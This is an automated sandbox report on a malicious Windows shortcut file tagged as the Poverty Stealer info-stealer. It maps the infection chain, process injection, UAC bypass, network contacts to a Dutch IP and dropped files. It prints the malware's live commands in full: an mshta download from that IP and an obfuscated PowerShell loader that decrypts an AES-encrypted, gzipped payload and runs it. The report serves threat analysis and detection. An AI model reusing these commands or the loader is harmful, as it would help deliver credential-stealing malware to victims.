Malware Analysis Report

2024-10-23 17:19

Sample ID 240305-cfhvqaca46
Target 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk
SHA256 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28
Tags
povertystealer evasion stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28

Threat Level: Known bad

The file 05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk was found to be: Known bad.

Malicious Activity Summary

povertystealer evasion stealer trojan

UAC bypass

Poverty Stealer

Detect Poverty Stealer Payload

Downloads MZ/PE file

Blocklisted process makes network request

Loads dropped DLL

Executes dropped EXE

Checks computer location settings

Suspicious use of SetThreadContext

Drops file in Windows directory

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Suspicious behavior: EnumeratesProcesses

Suspicious use of WriteProcessMemory

Modifies Internet Explorer settings

Views/modifies file attributes

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-03-05 02:01

Signatures

N/A

Analysis: behavioral2

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:03

Platform

win10v2004-20240226-en

Max time kernel

149s

Max time network

157s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

Signatures

Detect Poverty Stealer Payload

Description | Indicator | Process | Target
N/A | N/A | N/A | N/A (4 hits, no details recorded)

Poverty Stealer

stealer povertystealer

UAC bypass

evasion trojan
Description | Indicator | Process | Target
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0" | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A
N/A | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Downloads MZ/PE file

Checks computer location settings

Description | Indicator | Process | Target
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\cmd.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Windows\system32\mshta.exe | N/A
Key value queried | \REGISTRY\USER\S-1-5-21-3808065738-1666277613-1125846146-1000\Control Panel\International\Geo\Nation | C:\Users\Admin\AppData\Roaming\Photoshop.exe | N/A

Suspicious use of SetThreadContext

Description | Indicator | Process | Target
PID 628 set thread context of 1728 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%AppData%\Microsoft\Windows\Start Menu\Programs\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A

Enumerates physical storage devices

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (3 times)
Token: SeRestorePrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: 35 | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
Token: SeSecurityPrivilege | N/A | C:\Users\Admin\AppData\Local\Temp\main\7z.exe | N/A
(the four 7z.exe rows above repeat in this order 6 times, 24 rows in total, matching the six 7z.exe invocations listed under Processes)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 3868 wrote to memory of 2276 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe (2 times)
PID 2276 wrote to memory of 2444 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 times)
PID 2444 wrote to memory of 4704 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe (2 times)
PID 4704 wrote to memory of 1828 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 times)
PID 1828 wrote to memory of 1044 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (2 times)
PID 1044 wrote to memory of 4088 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Users\Admin\AppData\Roaming\Photoshop.exe (3 times)
PID 4088 wrote to memory of 4964 | N/A | C:\Users\Admin\AppData\Roaming\Photoshop.exe | C:\Windows\system32\cmd.exe (2 times)
PID 4964 wrote to memory of 2916 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\mode.com (2 times)
PID 4964 wrote to memory of 2300 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 2100 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 3680 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 4340 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 2404 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 4712 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\7z.exe (2 times)
PID 4964 wrote to memory of 3672 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\system32\attrib.exe (2 times)
PID 4964 wrote to memory of 628 | N/A | C:\Windows\system32\cmd.exe | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe (3 times)
PID 628 wrote to memory of 1728 | N/A | C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe | C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe (5 times)

Views/modifies file attributes

evasion
Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\attrib.exe | N/A

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = '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';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

C:\Users\Admin\AppData\Roaming\Photoshop.exe

"C:\Users\Admin\AppData\Roaming\Photoshop.exe"

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --no-appcompat-clear --mojo-platform-channel-handle=1408 --field-trial-handle=2744,i,16362475727591565961,3676688664819797550,262144 --variations-seed-version /prefetch:8

C:\Windows\system32\cmd.exe

C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\main\main.bat" /S"

C:\Windows\system32\mode.com

mode 65,10

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e file.zip -p125762329330388294023250819845 -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_5.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_4.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_3.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_2.zip -oextracted

C:\Users\Admin\AppData\Local\Temp\main\7z.exe

7z.exe e extracted/file_1.zip -oextracted

C:\Windows\system32\attrib.exe

attrib +H "nmYIeCI7gcMH.exe"

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

"nmYIeCI7gcMH.exe"

C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

"C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe"

Network

Country | Destination | Domain | Proto
US | 8.8.8.8:53 | 73.159.190.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 95.221.229.192.in-addr.arpa | udp
US | 8.8.8.8:53 | 241.154.82.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 194.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | 43.58.199.20.in-addr.arpa | udp
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
US | 8.8.8.8:53 | 35.251.92.91.in-addr.arpa | udp
US | 8.8.8.8:53 | 41.110.16.96.in-addr.arpa | udp
GB | 172.217.169.74:443 | N/A | tcp
US | 8.8.8.8:53 | 180.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | g.bing.com | udp
US | 204.79.197.200:443 | g.bing.com | tcp
US | 8.8.8.8:53 | 228.249.119.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 200.197.79.204.in-addr.arpa | udp
NL | 91.92.251.35:80 | 91.92.251.35 | tcp
US | 8.8.8.8:53 | 74.32.126.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 13.86.106.20.in-addr.arpa | udp
US | 13.107.253.64:443 | N/A | tcp
US | 8.8.8.8:53 | 157.123.68.40.in-addr.arpa | udp
US | 8.8.8.8:53 | 198.187.3.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 18.134.221.88.in-addr.arpa | udp
US | 8.8.8.8:53 | 209.178.17.96.in-addr.arpa | udp
US | 8.8.8.8:53 | joxi.net | udp
US | 104.21.73.118:80 | joxi.net | tcp
US | 104.21.73.118:443 | joxi.net | tcp
US | 8.8.8.8:53 | 118.73.21.104.in-addr.arpa | udp
US | 8.8.8.8:53 | 227.16.217.172.in-addr.arpa | udp
US | 8.8.8.8:53 | 55.36.223.20.in-addr.arpa | udp
US | 8.8.8.8:53 | 104.193.132.51.in-addr.arpa | udp
US | 8.8.8.8:53 | tse1.mm.bing.net | udp
US | 204.79.197.200:443 | tse1.mm.bing.net | tcp (4 times)

Files

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_s345blvh.btk.ps1

C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\Admin\AppData\Roaming\Photoshop.exe (3 entries, each with different hashes)

C:\Users\Admin\AppData\Local\Temp\main\main.bat

C:\Users\Admin\AppData\Local\Temp\main\file.bin

C:\Users\Admin\AppData\Local\Temp\main\7z.dll (7 entries)

C:\Users\Admin\AppData\Local\Temp\main\7z.exe (4 entries)

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_5.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_4.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_3.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_1.zip

C:\Users\Admin\AppData\Local\Temp\main\extracted\nmYIeCI7gcMH.exe

C:\Users\Admin\AppData\Local\Temp\main\extracted\ANTIAV~1.DAT

C:\Users\Admin\AppData\Local\Temp\main\extracted\file_2.zip

C:\Users\Admin\AppData\Local\Temp\main\nmYIeCI7gcMH.exe

Analysis: behavioral1

Detonation Overview

Submitted

2024-03-05 02:01

Reported

2024-03-05 02:03

Platform

win7-20240220-en

Max time kernel

120s

Max time network

120s

Command Line

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

Signatures

Blocklisted process makes network request

Description | Indicator | Process | Target
N/A | N/A | C:\Windows\system32\mshta.exe | N/A

Drops file in Windows directory

Description | Indicator | Process | Target
File opened for modification | C:\Windows\Vss\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (3 times)

Enumerates physical storage devices

Modifies Internet Explorer settings

adware spyware
Description | Indicator | Process | Target
Key created | \REGISTRY\USER\S-1-5-21-2721934792-624042501-2768869379-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\system32\mshta.exe | N/A

Suspicious use of AdjustPrivilegeToken

Description | Indicator | Process | Target
Token: SeDebugPrivilege | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | N/A (3 times)

Suspicious use of WriteProcessMemory

Description | Indicator | Process | Target
PID 2868 wrote to memory of 2608 | N/A | C:\Windows\system32\cmd.exe | C:\Windows\System32\forfiles.exe (3 times)
PID 2608 wrote to memory of 2468 | N/A | C:\Windows\System32\forfiles.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 times)
PID 2468 wrote to memory of 2264 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\system32\mshta.exe (3 times)
PID 2264 wrote to memory of 2548 | N/A | C:\Windows\system32\mshta.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 times)
PID 2548 wrote to memory of 2080 | N/A | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (3 times)

Processes

C:\Windows\system32\cmd.exe

cmd /c C:\Users\Admin\AppData\Local\Temp\05ef3c21d0ec7a856038e43c38032104948a535078649721b790548bf3260e28.lnk

C:\Windows\System32\forfiles.exe

"C:\Windows\System32\forfiles.exe" /p C:\Windows\Vss /c "powershell start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

start mshta http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\system32\mshta.exe

"C:\Windows\system32\mshta.exe" http://91.92.251.35/Downloads/Ten/photoshop

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -w 1 -ep Unrestricted -nop $ivXRRY = 'AAAAAAAAAAAAAAAAAAAAAHuMmso1AMeYPTqg2zmFYGLRAevBF0dzIBqwjcA2oQ2m8+KngkChOWPmpzxbUmz9iES2+wmHBDF4NNikX/9SA+8RZl3cvQDF00jQ0YmFtDKSgyA9b4/phWWKAp1Dd8/ytR6dOWK+gl5jA/RW80HrzF8zwxTzeNjzEdYIbAKbgIvUzpdq1PfpNgSDcrLwnf6wYoWXaDo+4f2SPpaJvd5bWGTy1EJj8FAnhAlSK/pbposi/hrdUPIRQvxHXKQQXZlr5NrPpLbhHHu78ydc6wwTCvZk77DaGi39y5qB230ZYk/e7tV27V3q01tqCxdx3tBcSKA7uAMyX8Ey/mjlsAOXbJ57iEolFiQtMkeLXRQnHlGQAom0cfG+TD7Cm01qvC5pMEeNJbLbciSdu9xs9T+c7tPx+xBYuPOvZFzYMN57JaeaZXehvSTkRY2hC6KnLkyRSwtTIKg1U8Ib7rr08szQWfdMaxRKVj3PGI/wQuxJ+WJA8tcTFqvoG6e88+mNmfdwt98gTMZWjCMtvnf4CBc92ueyM5vs56/2u+UVEJzepZUpK8lTTQTWjY1hlOFe0emGmyht+KS1zFSwWZBbRyNt0o5Dy9xG4GYyKw+ZUF5kF4SxYX6Yv7NLLkRJ1zA1vynUhhQD0GSeGUgNQ+quSJnyFSiEdpEa8NFWaep0COP5xyMiCOqi/EypECYLwCKEOwNqBqZ0/BjRXs3On8DJzDn994w83i+XNhIcnKswDJ1rV9Alxlwmt19nbz+Dn58l/ZcLWwvS6I+mTp8UBEk0CSxgzPNb8mX3rVtEvxZVuhLJa7/XWLcWSIGEtaXWpgRM/SbMXkdj7MO7V+BRMP1qf/dcU/TUhY1lotTnnHCHRFeLb1d1';$ftUus = 'ckRTZUh1VlFmVnlTa2luUmVGS3hIRGlVRktJVGF1aEI=';$qOFHjUF = New-Object 'System.Security.Cryptography.AesManaged';$qOFHjUF.Mode = [System.Security.Cryptography.CipherMode]::ECB;$qOFHjUF.Padding = [System.Security.Cryptography.PaddingMode]::Zeros;$qOFHjUF.BlockSize = 128;$qOFHjUF.KeySize = 256;$qOFHjUF.Key = [System.Convert]::FromBase64String($ftUus);$svgDF = [System.Convert]::FromBase64String($ivXRRY);$JuzxcfzI = $svgDF[0..15];$qOFHjUF.IV = $JuzxcfzI;$ceTYAICRx = $qOFHjUF.CreateDecryptor();$SsqoZtLKt = $ceTYAICRx.TransformFinalBlock($svgDF, 16, $svgDF.Length - 16);$qOFHjUF.Dispose();$JFlSsSI = New-Object System.IO.MemoryStream( , $SsqoZtLKt );$wBZvtko = New-Object System.IO.MemoryStream;$pFgGcVXpX = New-Object System.IO.Compression.GzipStream $JFlSsSI, ([IO.Compression.CompressionMode]::Decompress);$pFgGcVXpX.CopyTo( $wBZvtko );$pFgGcVXpX.Close();$JFlSsSI.Close();[byte[]] $xIpqeQj = $wBZvtko.ToArray();$BomjpubV = [System.Text.Encoding]::UTF8.GetString($xIpqeQj);$BomjpubV | 
powershell -

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -

Network

Country | Destination | Domain | Proto
NL | 91.92.251.35:80 | 91.92.251.35 | tcp

Files

C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms